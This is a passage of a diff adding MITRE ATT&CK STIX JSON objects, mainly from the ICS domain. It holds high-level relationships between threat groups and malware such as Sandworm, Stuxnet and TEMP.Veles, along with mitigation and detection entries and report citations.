"DHS/CISA Ransomware Targeting Healthcare October 2020", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020." + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020." + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020." + }, + { + "source_name": "CrowdStrike Wizard Spider October 2020", + "url": "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "description": "Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021." + }, + { + "source_name": "Sophos New Ryuk Attack October 2020", + "url": "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", + "description": "Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They’re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020." + }, + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020." + }, + { + "source_name": "DFIR Ryuk in 5 Hours October 2020", + "url": "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "description": "The DFIR Report. (2020, October 18). Ryuk in 5 Hours. Retrieved October 19, 2020." + }, + { + "source_name": "DFIR Ryuk's Return October 2020", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/", + "description": "The DFIR Report. (2020, October 8). Ryuk’s Return. Retrieved October 9, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "(Citation: CrowdStrike Ryuk January 2019)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)(Citation: Sophos New Ryuk Attack October 2020)(Citation: CrowdStrike Wizard Spider October 2020)", + "modified": "2022-05-20T17:07:10.940Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "target_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--41ff63a3-ddb9-47fb-8d92-bed74ed0d41d", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:55:23.567Z", + "description": "In the Ukraine 2015 Incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) blocked reporting messages by using malicious firmware to render communication devices inoperable. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a75ddacf-e87e-4a99-83f2-618486473163", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.217Z", + "relationship_type": "mitigates", + "description": "Patch the BIOS and EFI as necessary.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--874752f4-59a2-46e9-ae28-befe0142b223", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T14:37:52.169Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) uses a hardcoded password in the WinCC software's database server as one of the mechanisms used to propagate to nearby systems. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3a7d1db3-9383-4171-8938-382e9b0375c6", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:36:37.304Z", + "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) uses HTTP POST request to contact external command and control servers. (Citation: Booz Allen Hamilton)\n", + "relationship_type": "uses", + "source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--172e0537-7a9c-4610-9b07-32a841f0bd8d", + "created": "2023-03-30T18:57:58.377Z", + "revoked": false, + "external_references": [ + { + "source_name": "Symantec", + "description": "Symantec W32.Duqu The precursor to the next Stuxnet Retrieved. 2019/11/03 ", + "url": "https://docs.broadcom.com/doc/w32-duqu-11-en" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T18:57:58.377Z", + "description": "[Duqu](https://attack.mitre.org/software/S0038) downloads additional modules for the collection of data from local systems. The modules are named: infostealer 1, infostealer 2 and reconnaissance. (Citation: Symantec)", + "relationship_type": "uses", + "source_ref": "malware--68dca94f-c11d-421e-9287-7c501108e18c", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a846dbe5-9ef3-4fb6-93d5-f764671a75c8", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ICS CERT September 2018", + "description": "ICS CERT 2018, September 06 Advantech/Broadwin WebAccess RPC Vulnerability (Update B) Retrieved. 2019/12/05 ", + "url": "https://www.us-cert.gov/ics/advisories/ICSA-11-094-02B" + }, + { + "source_name": "ICS-CERT December 2014", + "description": "ICS-CERT 2014, December 10 ICS Alert (ICS-ALERT-14-281-01E) Ongoing Sophisticated Malware Campaign Compromising ICS (Update E) Retrieved. 2019/10/11 ", + "url": "https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:59:07.486Z", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) actors exploited vulnerabilities in GE's Cimplicity HMI and Advantech/Broadwin WebAccess HMI software which had been directly exposed to the internet. (Citation: ICS-CERT December 2014) (Citation: ICS CERT September 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--eac550b4-3bd2-4309-8b37-b797dd0bd8a7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.101Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6bf14e79-3287-4b9e-b222-9d527530df1e", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:57:08.560Z", + "description": "Monitor and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows , or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e257913e-40ba-4a05-ba97-0c3175c966b5", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + }, + { + "source_name": "Langer Stuxnet", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-17T16:01:04.366Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) manipulates the view of operators replaying process input and manipulating the I/O image to evade detection and inhibit protection functions. (Citation: Langer Stuxnet) (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--04fa6b94-d633-40ff-9ab2-88f58c07c3e1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.218Z", + "relationship_type": "mitigates", + "description": "Perform integrity checks of firmware before uploading it on a device. Utilize cryptographic hashes to verify the firmware has not been tampered with by comparing it to a trusted hash of the firmware. This could be from trusted data sources (e.g., vendor site) or through a third-party verification service.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--652a68a2-a26b-4e8c-86dd-fd83187ed043", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.198Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--afb0b60e-e604-4b96-abb9-57fdce4e5108", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.133Z", + "relationship_type": "mitigates", + "description": "Hot-standbys in diverse locations can ensure continued operations if the primarily system is compromised or unavailable. At the network layer, protocols such as the Parallel Redundancy Protocol can be used to simultaneously use redundant and diverse communication over a local network. (Citation: M. Rentschler and H. Heine)\n", + "source_ref": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd", + "target_ref": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95", + "external_references": [ + { + "source_name": "M. Rentschler and H. Heine", + "description": "M. Rentschler and H. Heine The Parallel Redundancy Protocol for industrial IP networks Retrieved. 2020/09/25 ", + "url": "https://ieeexplore.ieee.org/document/6505877" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9a44b2a8-9f4c-43df-9174-1cba6e165886", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.075Z", + "relationship_type": "mitigates", + "description": "Allow/denylists can be used to block access when excessive I/O connections are detected from a system or device during a specified time period.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--72bfda0b-31e9-4958-8d40-6efe816d9989", + "created": "2022-09-27T15:32:03.332Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:33:47.681Z", + "description": "Devices that provide user access to the underlying operating system may allow the installation of custom software to monitor OS API execution. Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "target_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-05-11T16:22:58.802Z", + "created": "2022-05-11T16:22:58.802Z", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "name": "Process/Event Alarm", + "description": "This includes a list of any process alarms or alerts produced to indicate unusual or concerning activity within the operational process (e.g., increased temperature/pressure)", + "x_mitre_version": "1.0", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-07T16:15:56.932Z", + "name": "Process Creation", + "description": "The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Logon Session Metadata", + "description": "Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it", + "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "aliases": [ + "Dragonfly 2.0", + "IRON LIBERTY", + "DYMALLOY", + "Berserk Bear" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0074", + "url": "https://attack.mitre.org/groups/G0074" + }, + { + "source_name": "DYMALLOY", + "description": "(Citation: Dragos DYMALLOY )" + }, + { + "source_name": "Berserk Bear", + "description": "(Citation: Fortune Dragonfly 2.0 Sept 2017)" + }, + { + "source_name": "IRON LIBERTY", + "description": "(Citation: Secureworks MCMD July 2019)(Citation: Secureworks IRON LIBERTY)" + }, + { + "source_name": "Dragonfly 2.0", + "description": "(Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017)" + }, + { + "source_name": "Dragos DYMALLOY ", + "url": "https://www.dragos.com/threat/dymalloy/", + "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020." + }, + { + "source_name": "Fortune Dragonfly 2.0 Sept 2017", + "url": "http://fortune.com/2017/09/06/hack-energy-grid-symantec/", + "description": "Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018." + }, + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + }, + { + "source_name": "Secureworks IRON LIBERTY", + "url": "https://www.secureworks.com/research/threat-profiles/iron-liberty", + "description": "Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020." + }, + { + "source_name": "Symantec Dragonfly Sept 2017", + "url": "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "description": "Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017." + }, + { + "source_name": "US-CERT TA18-074A", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least December 2015. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )", + "modified": "2022-05-11T14:00:00.188Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dragonfly 2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-11-30T22:46:40.135Z", + "name": "TEMP.Veles", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing [TRITON](https://attack.mitre.org/software/S0609), a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)", + "aliases": [ + "TEMP.Veles", + "XENOTIME" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.3", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "created": "2019-04-16T15:14:38.533Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0088", + "external_id": "G0088" + }, + { + "source_name": "TEMP.Veles", + "description": "(Citation: FireEye TRITON 2019)" + }, + { + "source_name": "Dragos Xenotime 2018", + "description": "Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.", + "url": "https://dragos.com/resource/xenotime/" + }, + { + "source_name": "FireEye TEMP.Veles 2018", + "description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html" + }, + { + "source_name": "FireEye TRITON 2019", + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html" + }, + { + "source_name": "FireEye TEMP.Veles JSON April 2019", + "description": "Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html" + }, + { + "source_name": "Pylos Xenotime 2019", + "description": "Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.", + "url": "https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/" + }, + { + "source_name": "XENOTIME", + "description": "The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609).(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Application Log Content", + "description": "Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications)", + "x_mitre_data_source_ref": "x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + 